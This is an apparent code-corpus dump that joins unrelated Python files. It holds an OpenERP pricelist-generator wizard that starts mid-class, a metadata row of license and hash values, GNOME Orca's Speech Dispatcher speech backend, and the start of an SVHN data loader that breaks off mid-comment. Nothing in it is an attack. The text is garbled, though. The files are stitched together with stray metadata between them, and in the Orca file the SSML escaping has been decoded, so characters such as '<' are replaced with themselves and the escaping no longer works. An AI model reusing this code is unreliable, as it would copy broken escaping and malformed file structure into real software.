""" Product pricelist generator
        Copy an inactive pricelist into a new pricelist containing all
        products, computing each price with the current pricelist rules
"""
_name = "product.pricelist.generator"
_description = "Product pricelist generator"
_columns = {
'pricelist_org_id': fields.many2one(
'product.pricelist', 'Original pricelist', required=True,
help="Choose original pricelist used to calculate new complete "
"pricelist/version"),
'new': fields.boolean('New',
help="Generate a new pricelist with this name"),
'new_name': fields.char('New version name', size=64),
'pricelist_des_id': fields.many2one(
'product.pricelist', 'Destination pricelist',
help="If no new pricelist, use this pricelist to upgrade fields"),
}
_defaults = {
'new': lambda *x: True,
}
def do_create_update(self, cr, uid, ids, context=None):
""" Create or update pricelist
@param cr: the current row, from the database cursor,
@param uid: the current user’s ID for security checks,
@param ids: List of ids
@return: Dictionary {}
"""
if context is None:
context={}
wiz_browse = self.browse(cr, uid, ids[0], context=context)
pricelist_ref_id = wiz_browse.pricelist_org_id.id
        if wiz_browse.new: # for now we do this
if not wiz_browse.new_name: # TODO and duplicated!
                # TODO communicate error!
return {'type': 'ir.actions.act_window_close'}
# Create new pricelist and pricelist version
pricelist_id = self.pool.get('product.pricelist').create(cr, uid, {
'name': wiz_browse.new_name,
'type': 'sale',
'tipology': 'historical',
})
if pricelist_id:
version_id = self.pool.get('product.pricelist.version').create(
cr, uid, {
'name': "Versione: " + wiz_browse.new_name + \
" definitiva",
#'date_end': False,
#'date_start': False,
#'company_id': False,
#'active': True,
'pricelist_id': pricelist_id,
})
else:
pass
else:
# Get pricelist and pricelist version
pricelist_id = 0
version_id = 0
        # pricelist/version created or found; the source pricelist must also exist
if pricelist_id and version_id and wiz_browse.pricelist_org_id:
product_ids = self.pool.get('product.product').search(
cr, uid, [('mexal_id', 'ilike', 'C')], context=context)
# TODO write right filter
for product in self.pool.get('product.product').read(
cr, uid, product_ids, ['id', 'name', 'code']):
if product['code'][0:1].upper() == "C":
price_calc = self.pool.get('product.pricelist').price_get(
cr, uid, [pricelist_ref_id], product['id'], 1.0, False, {
'uom': False,
'date': False,
})[pricelist_ref_id]
self.pool.get('product.pricelist.item').create(
cr, uid, {
'price_round': 0.00001,
'price_discount': 0.0, #0.052600000000000001,
#'base_pricelist_id': False,
'sequence': 200,
'price_max_margin': 0.0,
#'company_id': False,
#'product_tmpl_id': False,
'product_id': product['id'],
'base': 1,
#[3, 'Rif. anno 2011'],
'price_version_id': version_id,
'min_quantity': 1,
# TODO Calcolare in funzione del listino
'price_surcharge': price_calc,
#'price_min_margin': 0.0,
#'categ_id': False,
'name': "[%s] %s"%(product['code'], product['name']),
})
else:
            pass # TODO communicate error!
return {'type': 'ir.actions.act_window_close'}
# Product pricelist for customer:
class product_pricelist_customer(orm.TransientModel):
""" Product pricelist generator for customers
"""
_name = "product.pricelist.customer"
_description = "Product pricelist customer"
_columns = {
'partner_id': fields.many2one('res.partner', 'Partner', required=True,
help="Choose partner to create custom pricelist or "
"add quotations"),
'comment': fields.char('Comment', size=64,
help="Need to be created or updated"),
'product_id': fields.many2one('product.product', 'Product',
required=True),
'pricelist_id': fields.many2one(
'product.pricelist', 'Current pricelist', required=True,
help="Choose original pricelist used to calculate new complete "
"pricelist/version"),
'pricelist_model_history_id': fields.many2one(
'product.pricelist', 'Listino di riferimento',
help="Listino di riferimento applicato nel caso mancassero degli "
"articoli nel listino di base (usato per avere un raffronto "
"nel caso esistessero particolarità"),
'pricelist_model_id': fields.many2one(
'product.pricelist', 'Listino di paragone',
help="Listino di paragone per avere un raffronto con il prezzo "
"attuale del prodotto"),
'price': fields.float('Price listino cliente', digits=(16, 5)),
'price_model_history': fields.float(
'Prezzo list di rif.', digits=(16, 5)),
'price_model': fields.float('Prezzo di paragone', digits=(16, 5)),
'price_history': fields.text('Prezzo storico'),
'price_invoice_history': fields.text('Prezzo storico fatturato'),
}
# on change function
def onchange_pricelist(self, cr, uid, ids, pricelist_id, product_id,
context=None):
''' Read price from pricelist for product
'''
if context is None:
context={}
res = {'value': {}}
        if pricelist_id: # look up the pricelist
res['value']['price']=self.pool.get('product.pricelist').price_get(
cr, uid, [pricelist_id], product_id , 1.0, False, {
'uom': False, 'date': False})[pricelist_id]
            return res # stop here for now
        # Reset the price
return {'value': {'price': False}}
def onchange_partner_pricelist(self, cr, uid, ids, partner_id,
pricelist_id, product_id, context = None):
'''Create a new pricelist if not custom
add custom price
add old version as reference
'''
if context is None:
context = {}
res={'value': {}}
        if partner_id: # look up the partner's pricelist
partner = self.pool.get("res.partner").browse(cr, uid, partner_id)
partner_pricelist_id = partner.property_product_pricelist.id or 0
# pricelist_id only if not passed (to keep the change)
if not pricelist_id:
pricelist_id=partner_pricelist_id
res['value']['pricelist_id']=pricelist_id
res['value'][
'pricelist_model_history_id'] = \
partner.pricelist_model_history_id.id or 0
res['value']['pricelist_model_id'] = \
partner.pricelist_model_id.id or 0
            return res # stop here for now
return {'value': {}}
def onchange_partner_pricelist_product(self, cr, uid, ids, partner_id,
pricelist_id, product_id, pricelist_model_history_id,
pricelist_model_id, context = None):
'''Create a new pricelist if not custom
add custom price
add old version as reference
'''
if context is None:
context = {}
res = {'value': {}}
        if product_id and pricelist_id: # look up the pricelist
res['value']['price'] = self.pool.get(
'product.pricelist').price_get(
cr, uid, [pricelist_id], product_id , 1.0, False, {
'uom': False,
'date': False,
})[pricelist_id] if pricelist_id else ""
res['value']['price_model_history'] = self.pool.get(
'product.pricelist').price_get(
cr, uid, [pricelist_model_history_id], product_id , 1.0,
False, {
'uom': False,
'date': False,
})[pricelist_model_history_id] if \
pricelist_model_history_id else ""
res['value']['price_model'] = self.pool.get(
'product.pricelist').price_get(
cr, uid, [pricelist_model_id], product_id , 1.0, False, {
'uom': False,
'date': False,
})[pricelist_model_id] if pricelist_model_id else ""
# Order history:
order_line_ids = self.pool.get('sale.order.line').search(
cr, uid, [
('product_id','=',product_id),
('order_partner_id','=',partner_id),
])
if order_line_ids:
list_quotation = "%20s%20s%20s%40s\n" % (
"Data", "Ordine", "Prezzo", "Commento")
for line in self.pool.get('sale.order.line').browse(
cr, uid, order_line_ids):
list_quotation += "%20s%20s%20s%40s\n" % (
datetime.strptime(
line.order_id.date_order, '%Y-%m-%d').strftime(
'%d/%m/%Y'),
line.order_id.name,
line.price_unit,
line.price_comment or "")
res['value']['price_history'] = list_quotation
else:
res['value']['price_history'] = ""
# Invoice history:
product_proxy = self.pool.get('product.product').browse(
cr, uid, product_id)
product_code = product_proxy.code #"C3114409"
partner_proxy = self.pool.get('res.partner').browse(
cr, uid, partner_id)
partner_code = partner_proxy.mexal_c #"230.00179" # TODO parametrize
invoice_line_ids = self.pool.get('micronaet.invoice.line').search(
cr, uid, [
('product','=',product_code),
('partner','=',partner_code),
])
if invoice_line_ids:
list_quotation = "%20s%20s%20s%20s\n" % (
"Data","Fattura","Prezzo", "Q.")
for line in self.pool.get('micronaet.invoice.line').browse(
cr, uid, invoice_line_ids):
list_quotation += "%20s%20s%20s%20s\n" % (
datetime.strptime(line.date, '%Y%m%d').strftime(
'%d/%m/%Y'), line.name, line.price, line.quantity)
res['value']['price_invoice_history'] = list_quotation
else:
res['value']['price_invoice_history'] = ""
return res
        # Reset everything:
return {'value': {
'price': False,
'price_model_history': False,
'price_model': False,
'price_history': False,
'price_invoice_history': False,
}}
# event function
def do_insert_quotation(self, cr, uid, ids, context=None):
""" Create or update pricelist if non custom and add personalization
@param cr: the current row, from the database cursor,
@param uid: the current user’s ID for security checks,
@param ids: List of ids
@return: Dictionary {}
"""
if context is None:
context={}
wiz_browse = self.browse(cr, uid, ids[0], context=context)
customer_proxy = self.pool.get('res.partner').browse(
cr, uid, wiz_browse.partner_id.id)
pricelist_org_id = wiz_browse.pricelist_id.id # old pricelist set up
pricelist_proxy = self.pool.get('product.pricelist').browse(
cr, uid, pricelist_org_id)
if not pricelist_proxy.customized: # Create customized and first rule
update = False
pricelist_ref_id = self.pool.get('product.pricelist').create(
cr, uid, {
'name': "Personal: " + customer_proxy.name,
'type': 'sale',
'customized': True,
})
if pricelist_ref_id:
version_ref_id = self.pool.get(
'product.pricelist.version').create(
cr, uid, {
'name': "From " + \
customer_proxy.property_product_pricelist.name,
#'date_end': False,
#'date_start': False,
#'company_id': False,
#'active': True,
                        'pricelist_id': pricelist_ref_id, # just created
})
else:
                pass # TODO communicate error
        else: # already a custom pricelist
update = True
pricelist_ref_id = customer_proxy.property_product_pricelist.id
# TODO take the first for now!
version_ref_id = \
customer_proxy.property_product_pricelist.version_id[0].id
if not (pricelist_ref_id and version_ref_id):
            # TODO communicate error!
return {'type': 'ir.actions.act_window_close'}
pricelist_item_pool = self.pool.get('product.pricelist.item')
        # final rule: fall back to the previous pricelist as the reference
if not update: # Create ref. pricelist only for first new!
rule_id = pricelist_item_pool.create(cr, uid, {
'price_round': 0.00001,
'price_discount': 0.0, #0.052600000000000001,
'sequence': 500, # ultima
'price_max_margin': 0.0,
'base': 2, # pricelist version
'price_version_id': version_ref_id, #owner version
'min_quantity': 1,
'price_surcharge': 0.0,
'base_pricelist_id': pricelist_ref_id,
'name': "Listino rif: " + \
customer_proxy.property_product_pricelist.name,
})
        # Create the rule from the current product and price
        # TODO check whether it already exists!!!!!
rule_id = pricelist_item_pool.create(cr, uid, {
'price_round': 0.00001,
'price_discount': 0.0, #0.052600000000000001,
'sequence': 10, # tra le prime
'price_max_margin': 0.0,
'product_id': wiz_browse.product_id.id,
'base': 1,
'price_version_id': version_ref_id,
'min_quantity': 1,
'price_surcharge': wiz_browse.price,
'name': "[%s] %s" % (
wiz_browse.product_id.code,
wiz_browse.product_id.name),
})
# Set up partner with new pricelist
self.pool.get('res.partner').write(cr, uid, [wiz_browse.partner_id.id],
{'property_product_pricelist': pricelist_ref_id})
return {'type': 'ir.actions.act_window_close'}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | -7,251,331,763,021,639,000 | 40.988506 | 79 | 0.528552 | false |
GNOME/orca | src/orca/speechdispatcherfactory.py | 1 | 27427 | # Copyright 2006, 2007, 2008, 2009 Brailcom, o.p.s.
#
# Author: Tomas Cerha <[email protected]>
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the
# Free Software Foundation, Inc., Franklin Street, Fifth Floor,
# Boston MA 02110-1301 USA.
#
# [[[TODO: richb - Pylint is giving us a bunch of warnings along these
# lines throughout this file:
#
# W0142:202:SpeechServer._send_command: Used * or ** magic
#
# So for now, we just disable these warnings in this module.]]]
#
# pylint: disable-msg=W0142
"""Provides an Orca speech server for Speech Dispatcher backend."""
__id__ = "$Id$"
__version__ = "$Revision$"
__date__ = "$Date$"
__author__ = "Tomas Cerha <[email protected]>"
__copyright__ = "Copyright (c) 2006-2008 Brailcom, o.p.s."
__license__ = "LGPL"
from gi.repository import GLib
import re
import time
from . import chnames
from . import debug
from . import guilabels
from . import messages
from . import speechserver
from . import settings
from . import orca_state
from . import punctuation_settings
from . import settings_manager
from .acss import ACSS
_settingsManager = settings_manager.getManager()
try:
import speechd
except:
_speechd_available = False
else:
_speechd_available = True
try:
getattr(speechd, "CallbackType")
except AttributeError:
_speechd_version_ok = False
else:
_speechd_version_ok = True
PUNCTUATION = re.compile(r'[^\w\s]', re.UNICODE)
ELLIPSIS = re.compile('(\342\200\246|(?<!\\.)\\.{3,4}(?=(\\s|\\Z)))')
class SpeechServer(speechserver.SpeechServer):
# See the parent class for documentation.
_active_servers = {}
DEFAULT_SERVER_ID = 'default'
_SERVER_NAMES = {DEFAULT_SERVER_ID: guilabels.DEFAULT_SYNTHESIZER}
@staticmethod
def getFactoryName():
return guilabels.SPEECH_DISPATCHER
@staticmethod
def getSpeechServers():
servers = []
default = SpeechServer._getSpeechServer(SpeechServer.DEFAULT_SERVER_ID)
if default is not None:
servers.append(default)
for module in default.list_output_modules():
servers.append(SpeechServer._getSpeechServer(module))
return servers
@classmethod
def _getSpeechServer(cls, serverId):
"""Return an active server for given id.
Attempt to create the server if it doesn't exist yet. Returns None
when it is not possible to create the server.
"""
if serverId not in cls._active_servers:
cls(serverId)
# Don't return the instance, unless it is successfully added
# to `_active_Servers'.
return cls._active_servers.get(serverId)
@staticmethod
def getSpeechServer(info=None):
thisId = info[1] if info is not None else SpeechServer.DEFAULT_SERVER_ID
return SpeechServer._getSpeechServer(thisId)
@staticmethod
def shutdownActiveServers():
servers = [s for s in SpeechServer._active_servers.values()]
for server in servers:
server.shutdown()
# *** Instance methods ***
def __init__(self, serverId):
super(SpeechServer, self).__init__()
self._id = serverId
self._client = None
self._current_voice_properties = {}
self._acss_manipulators = (
(ACSS.RATE, self._set_rate),
(ACSS.AVERAGE_PITCH, self._set_pitch),
(ACSS.GAIN, self._set_volume),
(ACSS.FAMILY, self._set_family),
)
if not _speechd_available:
msg = 'ERROR: Speech Dispatcher is not available'
debug.println(debug.LEVEL_WARNING, msg, True)
return
if not _speechd_version_ok:
msg = 'ERROR: Speech Dispatcher version 0.6.2 or later is required.'
debug.println(debug.LEVEL_WARNING, msg, True)
return
# The following constants must be initialized in runtime since they
# depend on the speechd module being available.
try:
most = speechd.PunctuationMode.MOST
except:
most = speechd.PunctuationMode.SOME
self._PUNCTUATION_MODE_MAP = {
settings.PUNCTUATION_STYLE_ALL: speechd.PunctuationMode.ALL,
settings.PUNCTUATION_STYLE_MOST: most,
settings.PUNCTUATION_STYLE_SOME: speechd.PunctuationMode.SOME,
settings.PUNCTUATION_STYLE_NONE: speechd.PunctuationMode.NONE,
}
self._CALLBACK_TYPE_MAP = {
speechd.CallbackType.BEGIN: speechserver.SayAllContext.PROGRESS,
speechd.CallbackType.CANCEL: speechserver.SayAllContext.INTERRUPTED,
speechd.CallbackType.END: speechserver.SayAllContext.COMPLETED,
speechd.CallbackType.INDEX_MARK:speechserver.SayAllContext.PROGRESS,
}
self._default_voice_name = guilabels.SPEECH_DEFAULT_VOICE % serverId
try:
self._init()
except:
debug.printException(debug.LEVEL_WARNING)
msg = 'ERROR: Speech Dispatcher service failed to connect'
debug.println(debug.LEVEL_WARNING, msg, True)
else:
SpeechServer._active_servers[serverId] = self
self._lastKeyEchoTime = None
def _init(self):
self._client = client = speechd.SSIPClient('Orca', component=self._id)
client.set_priority(speechd.Priority.MESSAGE)
if self._id != self.DEFAULT_SERVER_ID:
client.set_output_module(self._id)
self._current_voice_properties = {}
mode = self._PUNCTUATION_MODE_MAP[settings.verbalizePunctuationStyle]
client.set_punctuation(mode)
client.set_data_mode(speechd.DataMode.SSML)
def updateCapitalizationStyle(self):
"""Updates the capitalization style used by the speech server."""
if settings.capitalizationStyle == settings.CAPITALIZATION_STYLE_ICON:
style = 'icon'
elif settings.capitalizationStyle == settings.CAPITALIZATION_STYLE_SPELL:
style = 'spell'
else:
style = 'none'
try:
self._client.set_cap_let_recogn(style)
except speechd.SSIPCommunicationError:
msg = "SPEECH DISPATCHER: Connection lost. Trying to reconnect."
debug.println(debug.LEVEL_INFO, msg, True)
self.reset()
self._client.set_cap_let_recogn(style)
except:
pass
def updatePunctuationLevel(self):
""" Punctuation level changed, inform this speechServer. """
mode = self._PUNCTUATION_MODE_MAP[settings.verbalizePunctuationStyle]
self._client.set_punctuation(mode)
def _send_command(self, command, *args, **kwargs):
try:
return command(*args, **kwargs)
except speechd.SSIPCommunicationError:
msg = "SPEECH DISPATCHER: Connection lost. Trying to reconnect."
debug.println(debug.LEVEL_INFO, msg, True)
self.reset()
return command(*args, **kwargs)
except:
pass
def _set_rate(self, acss_rate):
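        # Map Orca's ACSS rate range (0..99) onto Speech Dispatcher's -100..100 scale.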
rate = int(2 * max(0, min(99, acss_rate)) - 98)
self._send_command(self._client.set_rate, rate)
def _set_pitch(self, acss_pitch):
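        # Map Orca's ACSS pitch range (0..9) onto Speech Dispatcher's -100..100 scale.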
pitch = int(20 * max(0, min(9, acss_pitch)) - 90)
self._send_command(self._client.set_pitch, pitch)
def _set_volume(self, acss_volume):
volume = int(15 * max(0, min(9, acss_volume)) - 35)
self._send_command(self._client.set_volume, volume)
def _get_language_and_dialect(self, acss_family):
if acss_family is None:
acss_family = {}
language = acss_family.get(speechserver.VoiceFamily.LANG)
dialect = acss_family.get(speechserver.VoiceFamily.DIALECT)
if not language:
import locale
familyLocale, encoding = locale.getdefaultlocale()
language, dialect = '', ''
if familyLocale:
localeValues = familyLocale.split('_')
language = localeValues[0]
if len(localeValues) == 2:
dialect = localeValues[1]
return language, dialect
def _set_family(self, acss_family):
lang, dialect = self._get_language_and_dialect(acss_family)
if lang:
self._send_command(self._client.set_language, lang)
if dialect:
# Try to set precise dialect
self._send_command(self._client.set_language, lang + '-' + dialect)
try:
# This command is not available with older SD versions.
set_synthesis_voice = self._client.set_synthesis_voice
except AttributeError:
pass
else:
name = acss_family.get(speechserver.VoiceFamily.NAME)
self._send_command(set_synthesis_voice, name)
def _debug_sd_values(self, prefix=""):
if debug.debugLevel > debug.LEVEL_INFO:
return
try:
sd_rate = self._send_command(self._client.get_rate)
sd_pitch = self._send_command(self._client.get_pitch)
sd_volume = self._send_command(self._client.get_volume)
sd_language = self._send_command(self._client.get_language)
except:
sd_rate = sd_pitch = sd_volume = sd_language = "(exception occurred)"
family = self._current_voice_properties.get(ACSS.FAMILY)
styles = {settings.PUNCTUATION_STYLE_NONE: "NONE",
settings.PUNCTUATION_STYLE_SOME: "SOME",
settings.PUNCTUATION_STYLE_MOST: "MOST",
settings.PUNCTUATION_STYLE_ALL: "ALL"}
current = self._current_voice_properties
msg = "SPEECH DISPATCHER: %s\n" \
"ORCA rate %s, pitch %s, volume %s, language %s, punctuation: %s \n" \
"SD rate %s, pitch %s, volume %s, language %s" % \
(prefix,
self._current_voice_properties.get(ACSS.RATE),
self._current_voice_properties.get(ACSS.AVERAGE_PITCH),
self._current_voice_properties.get(ACSS.GAIN),
self._get_language_and_dialect(family)[0],
styles.get(_settingsManager.getSetting("verbalizePunctuationStyle")),
sd_rate,
sd_pitch,
sd_volume,
sd_language)
debug.println(debug.LEVEL_INFO, msg, True)
def _apply_acss(self, acss):
if acss is None:
acss = settings.voices[settings.DEFAULT_VOICE]
current = self._current_voice_properties
for acss_property, method in self._acss_manipulators:
value = acss.get(acss_property)
if value is not None:
if current.get(acss_property) != value:
method(value)
current[acss_property] = value
elif acss_property == ACSS.AVERAGE_PITCH:
method(5.0)
current[acss_property] = 5.0
elif acss_property == ACSS.GAIN:
method(10)
current[acss_property] = 5.0
elif acss_property == ACSS.RATE:
method(50)
current[acss_property] = 5.0
elif acss_property == ACSS.FAMILY:
method({})
current[acss_property] = {}
def __addVerbalizedPunctuation(self, oldText):
"""Depending upon the users verbalized punctuation setting,
adjust punctuation symbols in the given text to their pronounced
equivalents. The pronounced text will either replace the
punctuation symbol or be inserted before it. In the latter case,
        this is to retain spoken prosody.
Arguments:
- oldText: text to be parsed for punctuation.
Returns a text string with the punctuation symbols adjusted accordingly.
"""
style = _settingsManager.getSetting("verbalizePunctuationStyle")
if style == settings.PUNCTUATION_STYLE_NONE:
return oldText
spokenEllipsis = messages.SPOKEN_ELLIPSIS + " "
newText = re.sub(ELLIPSIS, spokenEllipsis, oldText)
symbols = set(re.findall(PUNCTUATION, newText))
for symbol in symbols:
try:
level, action = punctuation_settings.getPunctuationInfo(symbol)
except:
continue
if level != punctuation_settings.LEVEL_NONE:
# Speech Dispatcher should handle it.
#
continue
charName = " %s " % chnames.getCharacterName(symbol)
if action == punctuation_settings.PUNCTUATION_INSERT:
charName += symbol
newText = re.sub(symbol, charName, newText)
if orca_state.activeScript:
newText = orca_state.activeScript.utilities.adjustForDigits(newText)
return newText
def _speak(self, text, acss, **kwargs):
if isinstance(text, ACSS):
text = ''
# Mark beginning of words with U+E000 (private use) and record the
# string offsets
# Note: we need to do this before disturbing the text offsets
# Note2: we assume that text mangling below leave U+E000 untouched
last_begin = None
last_end = None
is_numeric = None
marks_offsets = []
marks_endoffsets = []
marked_text = ""
for i in range(len(text)):
c = text[i]
if c == '\ue000':
                # Original text already contains U+E000. But synthesizers will not
                # know what to do with it anyway, so discard it
continue
if not c.isspace() and last_begin == None:
# Word begin
marked_text += '\ue000'
last_begin = i
is_numeric = c.isnumeric()
elif c.isspace() and last_begin != None:
# Word end
if is_numeric:
                    # We had a wholly numeric word, possibly the next word is as well.
# Skip to next word
for j in range(i+1, len(text)):
if not text[j].isspace():
break
else:
is_numeric = False
# Check next word
while is_numeric and j < len(text) and not text[j].isspace():
if not text[j].isnumeric():
is_numeric = False
j += 1
if not is_numeric:
# add a mark
marks_offsets.append(last_begin)
marks_endoffsets.append(i)
last_begin = None
is_numeric = None
elif is_numeric and not c.isnumeric():
is_numeric = False
marked_text += c
if last_begin != None:
# Finished with a word
marks_offsets.append(last_begin)
marks_endoffsets.append(i + 1)
text = marked_text
text = self.__addVerbalizedPunctuation(text)
if orca_state.activeScript:
text = orca_state.activeScript.\
utilities.adjustForPronunciation(text)
# Replace no break space characters with plain spaces since some
# synthesizers cannot handle them. See bug #591734.
#
text = text.replace('\u00a0', ' ')
# Replace newline followed by full stop, since
# this seems to crash sd, see bgo#618334.
#
text = text.replace('\n.', '\n')
# Transcribe to SSML, translating U+E000 into marks
# Note: we need to do this after all mangling otherwise the ssml markup
# would get mangled too
ssml = "<speak>"
i = 0
for c in text:
if c == '\ue000':
if i >= len(marks_offsets):
# This is really not supposed to happen
msg = "%uth U+E000 does not have corresponding index" % i
debug.println(debug.LEVEL_WARNING, msg, True)
else:
ssml += '<mark name="%u:%u"/>' % (marks_offsets[i], marks_endoffsets[i])
i += 1
# Disable for now, until speech dispatcher properly parses them (version 0.8.9 or later)
#elif c == '"':
# ssml += '"'
#elif c == "'":
# ssml += '''
elif c == '<':
ssml += '<'
elif c == '>':
ssml += '>'
elif c == '&':
ssml += '&'
else:
ssml += c
ssml += "</speak>"
self._apply_acss(acss)
self._debug_sd_values("Speaking '%s' " % ssml)
self._send_command(self._client.speak, ssml, **kwargs)
def _say_all(self, iterator, orca_callback):
"""Process another sayAll chunk.
Called by the gidle thread.
"""
try:
context, acss = next(iterator)
except StopIteration:
pass
else:
def callback(callbackType, index_mark=None):
# This callback is called in Speech Dispatcher listener thread.
# No subsequent Speech Dispatcher interaction is allowed here,
# so we pass the calls to the gidle thread.
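                # Added note: index_mark carries the "start:end" name emitted by
                # _speak's <mark> elements, so the offsets parsed below are
                # relative to the utterance and are added to context.startOffset.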
t = self._CALLBACK_TYPE_MAP[callbackType]
if t == speechserver.SayAllContext.PROGRESS:
if index_mark:
index = index_mark.split(':')
if len(index) >= 2:
start, end = index[0:2]
context.currentOffset = context.startOffset + int(start)
context.currentEndOffset = context.startOffset + int(end)
msg = "SPEECH DISPATCHER: Got mark %d:%d / %d-%d" % \
(context.currentOffset, context.currentEndOffset, \
context.startOffset, context.endOffset)
debug.println(debug.LEVEL_INFO, msg, True)
else:
context.currentOffset = context.startOffset
context.currentEndOffset = None
elif t == speechserver.SayAllContext.COMPLETED:
context.currentOffset = context.endOffset
context.currentEndOffset = None
GLib.idle_add(orca_callback, context, t)
if t == speechserver.SayAllContext.COMPLETED:
GLib.idle_add(self._say_all, iterator, orca_callback)
self._speak(context.utterance, acss, callback=callback,
event_types=list(self._CALLBACK_TYPE_MAP.keys()))
return False # to indicate, that we don't want to be called again.
def _cancel(self):
self._send_command(self._client.cancel)
def _change_default_speech_rate(self, step, decrease=False):
acss = settings.voices[settings.DEFAULT_VOICE]
delta = step * (decrease and -1 or +1)
try:
rate = acss[ACSS.RATE]
except KeyError:
rate = 50
acss[ACSS.RATE] = max(0, min(99, rate + delta))
msg = 'SPEECH DISPATCHER: Rate set to %d' % rate
debug.println(debug.LEVEL_INFO, msg, True)
self.speak(decrease and messages.SPEECH_SLOWER \
or messages.SPEECH_FASTER, acss=acss)
def _change_default_speech_pitch(self, step, decrease=False):
acss = settings.voices[settings.DEFAULT_VOICE]
delta = step * (decrease and -1 or +1)
try:
pitch = acss[ACSS.AVERAGE_PITCH]
except KeyError:
pitch = 5
acss[ACSS.AVERAGE_PITCH] = max(0, min(9, pitch + delta))
msg = 'SPEECH DISPATCHER: Pitch set to %d' % pitch
debug.println(debug.LEVEL_INFO, msg, True)
self.speak(decrease and messages.SPEECH_LOWER \
or messages.SPEECH_HIGHER, acss=acss)
def _change_default_speech_volume(self, step, decrease=False):
acss = settings.voices[settings.DEFAULT_VOICE]
delta = step * (decrease and -1 or +1)
try:
volume = acss[ACSS.GAIN]
except KeyError:
volume = 10
acss[ACSS.GAIN] = max(0, min(9, volume + delta))
msg = 'SPEECH DISPATCHER: Volume set to %d' % volume
debug.println(debug.LEVEL_INFO, msg, True)
self.speak(decrease and messages.SPEECH_SOFTER \
or messages.SPEECH_LOUDER, acss=acss)
def getInfo(self):
return [self._SERVER_NAMES.get(self._id, self._id), self._id]
def getVoiceFamilies(self):
# Always offer the configured default voice with a language
# set according to the current locale.
from locale import getlocale, LC_MESSAGES
locale = getlocale(LC_MESSAGES)[0]
if locale is None or locale == 'C':
locale_language = None
else:
locale_lang, locale_dialect = locale.split('_')
locale_language = locale_lang + '-' + locale_dialect
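            # Illustration (added comment): a locale such as "en_US" from
            # getlocale() becomes "en-US" here; the matching below first looks
            # for an exact "en-US" match among the server's voices and then
            # falls back to the bare "en" language code.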
voices = ()
try:
# This command is not available with older SD versions.
list_synthesis_voices = self._client.list_synthesis_voices
except AttributeError:
pass
else:
try:
voices += self._send_command(list_synthesis_voices)
except:
pass
default_lang = ""
if locale_language:
            # Check how the locale's language appears in the server's voice list
for name, lang, variant in voices:
if lang == locale_language:
default_lang = locale_language
break
if not default_lang:
for name, lang, variant in voices:
if lang == locale_lang:
default_lang = locale_lang
if not default_lang:
default_lang = locale_language
voices = ((self._default_voice_name, default_lang, None),) + voices
families = []
for name, lang, variant in voices:
families.append(speechserver.VoiceFamily({ \
speechserver.VoiceFamily.NAME: name,
#speechserver.VoiceFamily.GENDER: speechserver.VoiceFamily.MALE,
speechserver.VoiceFamily.LANG: lang.partition("-")[0],
speechserver.VoiceFamily.DIALECT: lang.partition("-")[2],
speechserver.VoiceFamily.VARIANT: variant}))
return families
def speak(self, text=None, acss=None, interrupt=True):
# In order to re-enable this, a potentially non-trivial amount of work
# will be needed to ensure multiple utterances sent to speech.speak
        # do not result in the initial utterances getting cut off before they
# can be heard by the user. Anyone needing to interrupt speech can
# do so via speech.stop -- or better yet, by using the default script
# method's presentationInterrupt.
#if interrupt:
# self._cancel()
# "We will not interrupt a key echo in progress." (Said the comment in
# speech.py where these next two lines used to live. But the code here
# suggests we haven't been doing anything with the lastKeyEchoTime in
# years. TODO - JD: Dig into this and if it's truly useless, kill it.)
if self._lastKeyEchoTime:
interrupt = interrupt and (time.time() - self._lastKeyEchoTime) > 0.5
if text:
self._speak(text, acss)
def speakUtterances(self, utteranceList, acss=None, interrupt=True):
# In order to re-enable this, a potentially non-trivial amount of work
# will be needed to ensure multiple utterances sent to speech.speak
        # do not result in the initial utterances getting cut off before they
# can be heard by the user. Anyone needing to interrupt speech can
# do so via speech.stop -- or better yet, by using the default script
# method's presentationInterrupt.
#if interrupt:
# self._cancel()
for utterance in utteranceList:
if utterance:
self._speak(utterance, acss)
def sayAll(self, utteranceIterator, progressCallback):
GLib.idle_add(self._say_all, utteranceIterator, progressCallback)
def speakCharacter(self, character, acss=None):
self._apply_acss(acss)
name = chnames.getCharacterName(character)
if not name or name == character:
self._send_command(self._client.char, character)
return
if orca_state.activeScript:
name = orca_state.activeScript.\
utilities.adjustForPronunciation(name)
self.speak(name, acss)
def speakKeyEvent(self, event, acss=None):
event_string = event.getKeyName()
if orca_state.activeScript:
event_string = orca_state.activeScript.\
utilities.adjustForPronunciation(event_string)
lockingStateString = event.getLockingStateString()
event_string = "%s %s" % (event_string, lockingStateString)
self.speak(event_string, acss=acss)
self._lastKeyEchoTime = time.time()
def increaseSpeechRate(self, step=5):
self._change_default_speech_rate(step)
def decreaseSpeechRate(self, step=5):
self._change_default_speech_rate(step, decrease=True)
def increaseSpeechPitch(self, step=0.5):
self._change_default_speech_pitch(step)
def decreaseSpeechPitch(self, step=0.5):
self._change_default_speech_pitch(step, decrease=True)
def increaseSpeechVolume(self, step=0.5):
self._change_default_speech_volume(step)
def decreaseSpeechVolume(self, step=0.5):
self._change_default_speech_volume(step, decrease=True)
def stop(self):
self._cancel()
def shutdown(self):
self._client.close()
del SpeechServer._active_servers[self._id]
def reset(self, text=None, acss=None):
self._client.close()
self._init()
def list_output_modules(self):
"""Return names of available output modules as a tuple of strings.
This method is not a part of Orca speech API, but is used internally
by the Speech Dispatcher backend.
The returned tuple can be empty if the information can not be
obtained (e.g. with an older Speech Dispatcher version).
"""
try:
return self._send_command(self._client.list_output_modules)
except AttributeError:
return ()
except speechd.SSIPCommandError:
return ()
| lgpl-2.1 | -4,297,985,001,126,757,000 | 37.359441 | 100 | 0.584096 | false |
googleinterns/out-of-distribution | src/datasets/load_svhn.py | 1 | 2077 | import multiprocessing
import os
from typing import Union
import torchvision
from torch.utils.data import DataLoader, ConcatDataset, Subset
from torchvision import transforms
from root import from_root
from src.misc.utils import read_lines
DATA_DIRPATH = from_root("data/svhn")
SPLIT_DIRPATH = from_root("splits/svhn")
SVHN_TRAIN_MEAN = [0.4310, 0.4303, 0.4464]
SVHN_TRAIN_STD = [0.1965, 0.1983, 0.1994]
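# Note (added comment): the loader below validates its arguments, builds the
# train/val splits from the concatenated SVHN "train" + "extra" sets using the
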